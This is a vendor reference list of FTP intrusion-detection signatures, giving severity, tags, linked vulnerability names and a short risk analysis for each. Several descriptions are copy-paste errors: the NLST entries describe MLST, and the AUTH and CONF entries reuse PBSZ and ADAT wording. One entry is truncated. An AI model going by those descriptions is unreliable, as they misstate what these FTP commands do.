About this situation: FTP MLST command not refused by server
Context: FTP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-371-4219
Description: An FTP MLST command was not refused by the server. MLST is an FTP extension defined in an Internet-Draft. It is used to retrieve the file or directory information in a standard format. MLST is a normal FTP command on systems where both the client and the server support this extension. The defined policy may forbid using MLST in some FTP connections. This event was generated because the server did not give an error reply to an MLST command. Risk analysis: Risk level is fairly low. Most relevant log fields: "FTP server action" describes the server action: 1) connection terminated, 2) server violated the protocol in reply, 3) server replied "OK"
Back to top

FTP_NLST

About this situation: FTP MLST command given
Context: FTP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-378-4219
Description: The FTP NLST command was given. Risk analysis: Risk level is fairly low.
Back to top

FTP_NLST-Success

About this situation: FTP MLST command not refused by server
Context: FTP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-378-4219
Description: An FTP MLST command was not refused by the server. Risk analysis: Risk level is fairly low. Most relevant log fields: "FTP server action" describes the server action: 1) connection terminated, 2) server violated the protocol in reply, 3) server replied "OK"
Back to top

FTP_OPTS

About this situation: FTP OPTS command given
Context: FTP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-337-4219
Description: An FTP OPTS command was given. The OPTS command is an FTP extension [RFC 2389]. It is used to to speficy the desired server behavior in some later commands. OPTS is a normal FTP command on systems where both the client and the server support the extensions of [RFC 2389]. The defined policy may forbid using OPTS in some FTP connections. Risk analysis: Risk level is fairly low.
Back to top

FTP_OPTS-Argument-Too-Long-Success

About this situation: FTP OPTS command with too long argument not refused
Context: FTP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: This event was generated because the FTP server did not send an error reply to an FTP OPTS command that used too long an argument. Risk analysis: Risk varies between low and medium. Very long commands can be used in buffer overflow attacks against the server program. Most relevant log fields: "FTP server action" describes the server action: 1) connection terminated, 2) server violated the protocol in reply, 3) server replied "OK"
Back to top

FTP_OPTS-Success

About this situation: FTP OPTS command not refused by server
Context: FTP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-371-4219
Description: An FTP OPTS command was not refused by the server. The OPTS command is an FTP extension [RFC 2389]. It is used to to speficy the desired server behavior in some later commands. OPTS is a normal FTP command on systems where both the client and the server support the extensions of [RFC 2389]. The defined policy may forbid using OPTS in some FTP connections. This event was generated because the server did not give an error reply to an OPTS command. Risk analysis: Risk level is fairly low. Most relevant log fields: LN_IP_TCP_CLIENT__DESC_STR and LN_IP_TCP_SERVER__DESC_STR show the FTP client and the server IP addresses. "FTP server action" describes the server action: 1) connection terminated, 2) server violated the protocol in reply, 3) server replied "OK"
Back to top

FTP_Oversized-ACCT-Argument

About this situation: FTP client issued ACCT command with suspiciously long argument
Context: FTP Account Length Limit
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: FTP client issued ACCT command with a suspiciously long argument. This could be a sign of an attack, especially if there are other anomalies within the connection. About ACCT: ACCT is a rarely implemented FTP command that similar to USER. Risk Level: Risk level is fairly low.
Back to top

FTP_Oversized-ADAT-Argument

About this situation: FTP ADAT argument was suspiciously large
Context: FTP ADAT Argument Length Limit
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: An FTP ADAT command with a suspiciously large argument was given. This might be a sign of an attack, especially if there are other anomalies within this connection. About ADAT: ADAT is one of the FTP security extension commands in [RFC 2228]. It is used to set the maximum size of an encoded data block. ADAT is a normal FTP command on systems where both the client and the server support the security extensions. The defined policy may forbid using ADAT in some FTP connections. Risk analysis: Risk level is fairly low.
Back to top

FTP_Oversized-ALLO-Argument

About this situation: FTP ALLO command with suspiciously long argument has been detected
Context: FTP ALLO Argument Size Limit
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: FTP ALLO command with a suspiciously long argument has been detected. This could be a sign of an attack, especially if there are other suspicious events related to this connection. Risk analysis: Risk level is fairly low.
Back to top

FTP_Oversized-AUTH-Argument

About this situation: FTP AUTH argument was suspiciously large
Context: FTP AUTH Argument Length Limit
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: An FTP AUTH command with a suspiciously large argument was given. This might be a sign of an attack, especially if there are other anomalies within this connection. About AUTH: AUTH is one of the FTP security extension commands in [RFC 2228]. It is used to set the maximum size of an encoded data block. AUTH is a normal FTP command on systems where both the client and the server support the security extensions. The defined policy may forbid using ADAT in some FTP connections. Risk analysis: Risk level is fairly low.
Back to top

FTP_Oversized-CLNT-Argument

About this situation: FTP CLNT argument was suspiciously large
Context: FTP CLNT Argument Length Limit
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: An FTP CLNT command with a suspiciously large argument was given. This might be a sign of an attack, especially if there are other anomalies within this connection. Risk analysis: Risk level is fairly low.
Back to top

FTP_Oversized-CONF-Argument

About this situation: FTP CONF argument was suspiciously large
Context: FTP CONF Argument Length Limit
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: An FTP CONF command with a suspiciously large argument was given. This might be a sign of an attack, especially if there are other anomalies within this connection. About CONF: CONF is one of the FTP security extension commands in [RFC 2228]. It is used to set the maximum size of an encoded data block. CONF is a normal FTP command on systems where both the client and the server support the security extensions. The defined policy may forbid using ADAT in some FTP connections. Risk analysis: Risk level is fairly low.
Back to top

FTP_Oversized-ENC-Argument

About this situation: FTP ENC argument was suspiciously large
Context: FTP ENC Argument Length Limit
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: An FTP ENC command with a suspiciously large argument was given. This might be a sign of an attack, especially if there are other anomalies within this connection. About ENC: ENC is one of the FTP security extension commands in [RFC 2228]. It is used to set the maximum size of an encoded data block. ENC is a normal FTP command on systems where both the client and the server support the security extensions. The defined policy may forbid using ENC in some FTP connections. Risk analysis: Risk level is fairly low.
Back to top

FTP_Oversized-EPRT-Argument

About this situation: FTP EPRT argument was suspiciously large
Context: FTP EPRT Argument Length Limit
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: An FTP EPRT command with a suspiciously large argument was given. This might be a sign of an attack, especially if there are other anomalies within this connection. About EPRT: EPRT is one of the FTP IPv6 extension commands in [RFC 2428]. EPRT is a normal FTP command on systems that utilize IPv6. Risk analysis: Risk level is fairly low.
Back to top

FTP_Oversized-ESTP-Argument

About this situation: FTP ESTP argument was suspiciously large
Context: FTP ESTP Argument Length Limit
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: An FTP ESTP command with a suspiciously large argument was given. This might be a sign of an attack, especially if there are other anomalies within this connection. Risk analysis: Risk level is fairly low.
Back to top

FTP_Oversized-HELP-Argument

About this situation: FTP HELP argument was suspiciously large
Context: FTP HELP Argument Length Limit
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: An FTP HELP command with a suspiciously large argument was given. This might be a sign of an attack, especially if there are other anomalies within this connection. Risk analysis: Risk level is fairly low.
Back to top

FTP_Oversized-LANG-Argument

About this situation: FTP LANG argument was suspiciously large
Context: FTP LANG Argument Length Limit
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: An FTP LANG command with a suspiciously large argument was given. This might be a sign of an attack, especially if there are other anomalies within this connection. Risk analysis: Risk level is fairly low.
Back to top

FTP_Oversized-LPRT-Argument

About this situation: FTP LPRT argument was suspiciously large
Context: FTP LPRT Argument Length Limit
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: An FTP LPRT command with a suspiciously large argument was given. This might be a sign of an attack, especially if there are other anomalies within this connection. About LPRT: LPRT is one of the FTP IPv6 extension commands in [RFC 1639]. LPRT is a normal FTP command on systems that utilize IPv6. Risk analysis: Risk level is fairly low.
Back to top

FTP_Oversized-MIC-Argument

About this situation: FTP MIC argument was suspiciously large
Context: FTP MIC Argument Length Limit
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: An FTP MIC command with a suspiciously large argument was given. This might be a sign of an attack, especially if there are other anomalies within this connection. About MIC: MIC is one of the FTP security extension commands in [RFC 2228]. Risk analysis: Risk level is fairly low.
Back to top

FTP_Oversized-OPTS-Argument

About this situation: FTP OPTS argument was suspiciously large
Context: FTP OPTS Argument Length Limit
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: An FTP OPTS command with a suspiciously large argument was given. This might be a sign of an attack, especially if there are other anomalies within this connection. Risk analysis: Risk level is fairly low.
Back to top

FTP_Oversized-Password

About this situation: FTP password was suspiciously large
Context: FTP Password Length Limit
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: A suspiciously long password was given. This might be a sign of an attack, especially if there are other anomalies within this connection. Risk analysis: Risk level is low.
Back to top

FTP_Oversized-Pathname

About this situation: Pathname within an FTP session was suspiciously large
Context: FTP pathname Length Limit
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Vulnerability: Freefloat-FTP-Server-Invalid-Command-Buffer-Overflow
Description: A suspiciously long pathname was given within an FTP session. This might be a sign of an attack, especially if there are other anomalies within this connection. Risk analysis: Risk level is low.
Back to top

FTP_Oversized-PBSZ-Arg

About this situation: FTP PBSZ used suspiciously large protection buffer
Context: FTP PBSZ Argument Size Limit
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: An FTP PBSZ command with suspiciously large protection buffer argument was given. This might be a sign of an attack, especially if there are other anomalies within this connection. About PBSZ: PBSZ is one of the FTP security extension commands in [RFC 2228]. It is used to set the maximum size of an encoded data block. PBSZ is a normal FTP command on systems where both the client and the server support the security extensions. The defined policy may forbid using PBSZ in some FTP connections. Risk analysis: Risk level is fairly low. Risk Leve
Back to top

FTP_Oversized-Reply

About this situation: FTP server reply was suspiciously long
Context: FTP Reply Length Limit
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-371-4219
Description: A suspiciously long reply given by the server within an FTP session. This might be a sign of an attack, especially if there are other anomalies within this connection. Risk analysis: Risk level is fairly low.
Back to top

FTP_Oversized-Reply-Line

About this situation: FTP server reply was suspiciously long
Context: FTP Reply Line Length Limit
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-371-4219
Description: A suspiciously long reply line was given by the server within an FTP session. This might be a sign of an attack, especially if there are other anomalies within this connection. Risk analysis: Risk level is fairly low.
Back to top

FTP_Oversized-REST

About this situation: FTP REST argument was suspiciously large
Context: FTP REST Marker Length Limit
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: An FTP REST command with suspiciously large argument was given. This might be a sign of an attack, especially if there are other anomalies within this connection. Risk analysis: Risk level is fairly low.
Back to top

FTP_Oversized-SITE-Argument

About this situation: FTP SITE argument was suspiciously large
Context: FTP SITE Argument Length Limit
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: An FTP SITE command with suspiciously large argument was given. This might be a sign of an attack, especially if there are other anomalies within this connection. Risk analysis: Risk level is fairly low.
Back to top

FTP_Oversized-Username

About this situation: FTP username was suspiciously large
Context: FTP Username Length Limit
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Vulnerability: OPIE-FTP-Username-Off-By-One-Stack-Buffer-Overflow
Microsoft-Internet-Explorer-CElement-Memory-Corruption
Freefloat-FTP-Server-Invalid-Command-Buffer-Overflow
Description: A suspiciously long username was given. This might be a sign of an attack, especially if there are other anomalies within this connection. Risk analysis: Risk level is fairly low.
Back to top

FTP_Parameter-Missing

About this situation: Mandatory parameter missing from FTP command
Context: FTP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-371-4219
Description: A mandatory parameter is missing from an FTP command. The FTP module recognized the command the FTP client sent, but it could not be fully processed because the command did not have a mandatory parameter. The command may be misspelled (if the client is an interactive user instead of a FTP client program), or the client may be trying to do something suspicious. Risk analysis: Risk level is medium.
Back to top

FTP_Parameter-Missing-Success

About this situation: Server did not refuse FTP command with missing mandatory parameter
Context: FTP without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-371-4219
Description: The server did not refuse an FTP command with a missing mandatory parameter. The FTP module recognized the command the FTP client sent, but it could not be fully processed because the command did not have a mandatory parameter. The command may be misspelled (if the client is an interactive user instead of a FTP client program), or the client may be trying to do something suspicious. This event was generated because the server did not give an error reply to an FTP command with missing mandatory parameter. Risk analysis: Risk level is medium.
Back to top

FTP_Pass-Too-Long-Success

About this situation: FTP PASS command with too long password not refused
Context: FTP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: This event was generated because the FTP server did not send an error reply to an FTP PASS command that used too long a password. Risk analysis: Risk varies between low and medium. Very long commands can be used in buffer overflow attacks against the server program. Most relevant log fields: "FTP server action" describes the server action: 1) connection terminated, 2) server violated the protocol in reply, 3) server replied "OK"
Back to top

FTP_PASV-IP-Address-Mismatch

About this situation: IP address mismatch detected in FTP PASV command
Context: FTP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: An IP address mismatch was detected in an FTP PASV command. The IP address in an FTP PASV or LPSV command reply was not the IP address of the FTP server. Risk analysis: Risk level is medium. This should not happen normally. The upcoming data connection will probably be opened to the wrong host.
Back to top

FTP_PASV-Unused

About this situation: FTP PASV, EPSV, or LPSV command was followed by another PASV, EPSV, or LPSV without data transfer in between
Context: FTP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: The FTP PASV command requests the server to open a listening port for incoming data connections. This event was generated because no data transfer was initiated using the port reserved by the PASV (or similar) command. Risk analysis: Risk level is fairly low. This may indicate a problem with the firewall configuration if the client cannot open a data connection. If many events like this are generated, somebody may be trying to use up the ports on the server.
Back to top

FTP_Pathname-Extension

About this situation: Extended pathname syntax of [RFC 2640] detected
Context: FTP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-161-2032
Description: An FTP command was detected with one or more characters in the pathname that use the internationalization extensions of [RFC 2640]. It is normal to use these extensions in environments that support them. The defined security policy may forbid using these extensions in some FTP connections. Risk analysis: Risk level is fairly low.
Back to top

FTP_Pathname-Extension-Success

About this situation: Command using extended pathname syntax of [RFC 2640] not refused by server
Context: FTP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-161-2032
Description: An FTP command was detected with one or more characters in the pathname that use the internationalization extensions of [RFC 2640]. It is normal to use these extensions in environments that support them. The defined security policy may forbid using these extensions in some FTP connections. This event was generated because the server did not give an error reply to the command. Risk analysis: Risk level is fairly low. Most relevant log fields: "FTP server action" describes the server action: 1) connection terminated, 2) server violated the protocol in reply, 3) server replied "OK"
Back to top

FTP_Pathname-Too-Long-Success

About this situation: FTP command with too long pathname not refused
Context: FTP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: This event was generated because the FTP server did not send an error reply to an FTP command that used too long a pathname. Risk analysis: Risk varies between low and medium. Very long commands can be used in buffer overflow attacks against the server program. Most relevant log fields: "FTP server action" describes the server action: 1) connection terminated, 2) server violated the protocol in reply, 3) server replied "OK"
Back to top

FTP_PBSZ

About this situation: FTP PBSZ command given
Context: FTP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-371-4219
Description: An FTP PBSZ command was given. PBSZ is one of the FTP security extension commands in [RFC 2228]. It is used to set the maximum size of an encoded data block. PBSZ is a normal FTP command on systems where both the client and the server support the security extensions. The defined policy may forbid using PBSZ in some FTP connections. Risk analysis: Risk level is fairly low.
Back to top

FTP_PBSZ-Success

About this situation: FTP PBSZ command not refused by server
Context: FTP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-371-4219
Description: An FTP PBSZ command was not refused by the server. PBSZ is one of the FTP security extension commands in [RFC 2228]. It is used to set the maximum size of an encoded data block. PBSZ is a normal FTP command on systems where both the client and the server support the security extensions. The defined policy may forbid using PBSZ in some FTP connections. This event was generated because the server did not give an error reply to PBSZ command. Risk analysis: Risk level is fairly low. Most relevant log fields: "FTP server action" describes the server action: 1) connection terminated, 2) server violated the protocol in reply, 3) server replied "OK"
Back to top

FTP_PBSZ-Too-Big-Success

About this situation: Too large FTP PBSZ command not refused
Context: FTP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: This event was generated because the FTP server did not send an error reply to an FTP PBSZ command that used too large a buffer size. Risk analysis: Risk varies between low and medium. Very long commands can be used in buffer overflow attacks against the server program. Most relevant log fields: "FTP server action" describes the server action: 1) connection terminated, 2) server violated the protocol in reply, 3) server replied "OK"
Back to top

FTP_Pipeline-Detected

About this situation: FTP client sent command before waiting for reply to previous command
Context: FTP without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-160-2032
Vulnerability: Microsoft-.NET-FormatFtpCommand-Crlf-Injection-Arbitrary-File-Write-And-Deletion
Description: The FTP client sent a command before waiting for a reply to the previous command. According to [RFC 959], an FTP client should wait for the reply to the previous command before sending the next command. An exception is the abortion of the data transfer by sending a Telnet interrupt and the FTP ABOR command. Risk analysis: Risk level is fairly low. The client is probably not a real FTP client program.
Back to top

FTP_Pipeline-Violation

About this situation: FTP client sent suspiciously many commands without waiting for server replies
Context: FTP Pipeline Length Limit
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: FTP client issued suspiciously many commands without waiting for server replies. It is quite usual that client sends two commands without waiting for the replies, but sending more is often a sign of an attack. About FTP command pipelining:_ According to [RFC 959], an FTP client should wait for the reply to the previous command before sending the next command. An exception is the abortion of the data transfer by sending a Telnet interrupt and the FTP ABOR command. Risk level is medium.
Back to top

FTP_PORT-IP-Address-Mismatch

About this situation: Address mismatch detected in FTP PORT command
Context: FTP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Vulnerability: FTP-Bounce-Attack
Description: An address mismatch was detected in an FTP PORT command. The IP address in an FTP PORT, LPRT, or EPRT command was not the IP address of the FTP client. The client is attempting to make the server open a data connection to somewhere else than to the client host. Risk analysis: Risk level is medium.
Back to top

FTP_PORT-IP-Address-Mismatch-Success

About this situation: FTP server did not reject command with PORT address mismatch
Context: FTP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Vulnerability: FTP-Bounce-Attack
Description: The FTP server did not reject a command with a PORT address mismatch. The IP address in an FTP PORT, LPRT, or EPRT command was not the IP address of the FTP client. The client is attempting to make the server open a data connection to somewhere else than to the client host. This event was generated because the server did not give an error reply to the command with a PORT, LPRT, or EPRT address mismatch. Risk analysis: Risk level is medium. Most relevant log fields: "FTP server action" describes the server action: 1) connection terminated, 2) server violated the protocol in reply, 3) server replied "OK"
Back to top

FTP_PROT

About this situation: FTP PROT command given
Context: FTP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-371-4219
Description: The FTP PROT command was given. PROT is one of the FTP security extension commands in [RFC 2228]. It is used to select the data channel protection level. PROT is a normal FTP command on systems where both the client and the server support the security extensions. The defined policy may forbid using PROT in some FTP connections. Risk analysis: Risk level is fairly low.
Back to top

FTP_PROT-Success

About this situation: FTP PROT command not refused by server
Context: FTP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-371-4219
Description: An FTP PROT command was not refused by the server. PROT is one of the FTP security extension commands in [RFC 2228]. It is used to select the data channel protection level. PROT is a normal FTP command on systems where both the client and the server support the security extensions. The defined policy may forbid using PROT in some FTP connections. This event was generated because the server did not give an error reply to PROT command. Risk analysis: Risk level is fairly low. Most relevant log fields: "FTP server action" describes the server action: 1) connection terminated, 2) server violated the protocol in reply, 3) server replied "OK"
Back to top

FTP_Reply-Code-Conflict

About this situation: Conflicting FTP server reply codes detected in multiline reply
Context: FTP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: Conflicting FTP server reply codes were detected in a multiline reply. Either the FTP module has lost track of which reply lines belong to a single (multiline) reply, or the server is not following the FTP specifications. Risk analysis: Risk level is medium. This should not happen when the server is a real FTP server program.
Back to top

FTP_Reply-Extra

About this situation: FTP server sent extra reply
Context: FTP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: The FTP server sent an extra reply. Either the FTP module has somehow lost track of which reply belongs to which request, or the FTP server is not performing according to the FTP specifications. Risk analysis: Risk level is medium.
Back to top

FTP_Reply-Protected

About this situation: Protected reply from FTP server detected
Context: FTP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-371-4219
Description: A protected reply from an FTP server was detected. As a result of using the FTP security extensions [RFC 2228], the server sent a protected reply (reply code starting with a '6'). The FTP module cannot validate the contents of the reply. The defined security policy may forbid using the security extensions in some FTP connections. Risk analysis: Risk level is fairly low.
Back to top

FTP_Reply-Syntax-Incorrect

About this situation: FTP server reply used incorrect syntax
Context: FTP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: The FTP server reply used incorrect syntax. The FTP module could not interpret the FTP server reply. Risk analysis: Risk varies between low and medium. It is possible that the server program is not an FTP server.
Back to top

FTP_Reply-Unexpected

About this situation: FTP server sent unexpected reply code
Context: FTP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: The FTP server sent an unexpected reply code. Either the FTP module somehow lost track of which commands and replies belong together, or the server sent a reply code that should not be given as a reply to the client command. Risk analysis: Risk level is fairly low.
Back to top

FTP_REST-Marker-Too-Long-Success

About this situation: FTP REST command with too long marker not refused
Context: FTP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: This event was generated because the FTP server did not send an error reply to an FTP REST command that used too long a marker. Risk analysis: Risk varies between low and medium. Very long commands can be used in buffer overflow attacks against the server program. Most relevant log fields: "FTP server action" describes the server action: 1) connection terminated, 2) server violated the protocol in reply, 3) server replied "OK"
Back to top

FTP_REST-Stream

About this situation: FTP REST command given in stream mode
Context: FTP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-161-2032
Description: The FTP REST command was given in stream mode. The FTP REST command in stream mode is an FTP extension defined in an Internet-Draft. It is used to start file transfer at a given position in the file. The FTP REST command in stream mode is a normal FTP operation in systems where both the server and the client support the extension. However, it can allow the same file to be transferred in parallel over several TCP connections, thus bypassing connection-based bandwidth limitations on some systems. The defined security policy may forbid using the FTP REST command in stream mode in some FTP connections. Risk analysis: Risk level is fairly low.
Back to top

FTP_REST-Stream-Success

About this situation: FTP REST command in stream mode not refused by server
Context: FTP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-161-2032
Description: An FTP REST command in stream mode was not refused by the server. The FTP REST command in stream mode is an FTP extension defined in an Internet-Draft. It is used to start file transfer at a given position in the file. The FTP REST command in stream mode is a normal FTP operation in systems where both the server and the client support the extension. However, it can allow the same file to be transferred in parallel over several TCP connections, thus bypassing connection-based bandwidth limitations on some systems. The defined security policy may forbid using the FTP REST command in stream mode in some FTP connections. This event was generated because the server did not give an error reply to the command. Risk analysis: Risk level is fairly low. Most relevant log fields: "FTP server action" describes the server action: 1) connection terminated, 2) server violated the protocol in reply, 3) server replied "OK"
Back to top

FTP_Server-Syntax-Correct

About this situation: FTP protocol detected
Context: FTP Server Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-1323-5242
Last changed: sgpkg-ips-1481-5242
Description:
Back to top

FTP_SITE

About this situation: FTP client gave SITE command
Context: FTP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-463-5211
Description: The FTP client used the SITE command, which has numerous vulnerabilities on many servers. The FTP module cannot verify SITE arguments because, depending on the server and the operating system, the arguments can be almost anything. The defined security policy may forbid using the SITE command on some FTP connections. Risk analysis: Risk level is fairly low.
Back to top

FTP_SITE-Argument-Too-Long-Success

About this situation: FTP SITE command with too long argument not refused
Context: FTP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: This event was generated because the FTP server did not send an error reply to an FTP SITE command that used too long an argument. Risk analysis: Risk varies between low and medium. Very long commands can be used in buffer overflow attacks against the server program. Most relevant log fields: "FTP server action" describes the server action: 1) connection terminated, 2) server violated the protocol in reply, 3) server replied "OK"
Back to top

FTP_SITE-Success

About this situation: FTP SITE command not refused by server
Context: FTP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-463-5211
Description: The FTP server did not send an error reply when the FTP client gave the SITE command. The SITE command has numerous vulnerabilities on many servers. The FTP module cannot verify SITE arguments because, depending on the server and the operating system, the arguments can be almost anything. The defined security policy may forbid using the SITE command on some FTP connections. This event was generated because the server did not give an error reply when FTP client gave the SITE command. Risk analysis: Risk level is fairly low. Most relevant log fields: "FTP server action" describes the server action: 1) connection terminated, 2) server violated the protocol in reply, 3) server replied "OK"
Back to top

FTP_Size-Command

About this situation: FTP SIZE command given
Context: FTP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-160-2032
Description: The FTP SIZE command was given. SIZE is an FTP extension defined in an Internet-Draft. It is used to retrieve the file size in a standard format. SIZE is a normal FTP command on systems where both the client and the server support this extension. The defined policy may forbid using SIZE in some FTP connections. Risk analysis: Risk level is fairly low.
Back to top

FTP_SIZE-Success

About this situation: FTP SIZE command not refused by server
Context: FTP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-160-2032
Description: An FTP SIZE command was not refused by the server. SIZE is an FTP extension defined in an Internet-Draft. It is used to retrieve the file size in a standard format. SIZE is a normal FTP command on systems where both the client and the server support this extension. The defined policy may forbid using SIZE in some FTP connections. This event was generated because the server did not give an error reply to SIZE command. Risk analysis: Risk level is fairly low. Most relevant log fields: "FTP server action" describes the server action: 1) connection terminated, 2) server violated the protocol in reply, 3) server replied "OK"
Back to top

FTP_SS-Administrator-Login-Failure

About this situation: A failed administrator login attempt detected
Context: FTP Server Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic FTP server, Any Operating System not specific, Generic FTP server not specific, Failed Login, Anomalies, TCP Server Traffic
First detected in: sgpkg-ips-92-1314
Last changed: sgpkg-ips-159-2032
Vulnerability: FTP-Administrator-Login-Failure
Description:
Back to top

FTP_SS-Attachmate-Reflection-FTP-Client-Pwd-Command-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Attachmate Reflection FTP Client detected
Context: FTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Attachmate Reflection FTP Client, CVE2014, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-630-5211
Vulnerability: Attachmate-Reflection-FTP-Client-Pwd-Command-Buffer-Overflow
Description:
Back to top

FTP_SS-CA-eTrust-Secure-Content-Manager-Gateway-FTP-Pasv-Stack-Overflow

About this situation: An attempt to exploit a vulnerability in CA eTrust Secure Content Manager detected
Context: FTP Server Stream
Severity: 7
